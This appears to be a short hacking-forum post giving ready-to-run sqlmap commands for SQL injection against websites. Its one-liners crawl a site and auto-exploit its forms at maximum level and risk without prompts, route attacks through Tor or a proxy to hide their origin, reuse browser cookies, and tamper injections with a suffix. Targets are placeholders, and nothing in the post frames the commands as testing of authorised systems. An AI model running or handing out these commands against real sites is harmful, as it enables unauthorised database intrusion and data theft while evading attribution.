09-14-2022, 09:51 PM
Crawl a website with SQLmap and auto-exploit
Using TOR with SQLmap
Using a proxy with SQLmap
Using Chrome cookie and a Proxy
Using suffix to tamper the injection
Quote:sqlmap -u "https://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms
Using TOR with SQLmap
Quote:sqlmap -u "https://www.target.com" --tor --tor-type=SOCKS5 --time-sec 11 --check-tor --level=5 --risk=3 --threads=5
Using a proxy with SQLmap
Quote:sqlmap -u "https://www.target.com" --proxy="https://127.0.0.1:8080"
Using Chrome cookie and a Proxy
Quote:sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/cookie.txt --proxy "https://127.0.0.1:8080" -f --time-sec 15 --level 3
Using suffix to tamper the injection
Quote:python sqlmap.py -u "https://example.com/?id=1" -p id --suffix="-- "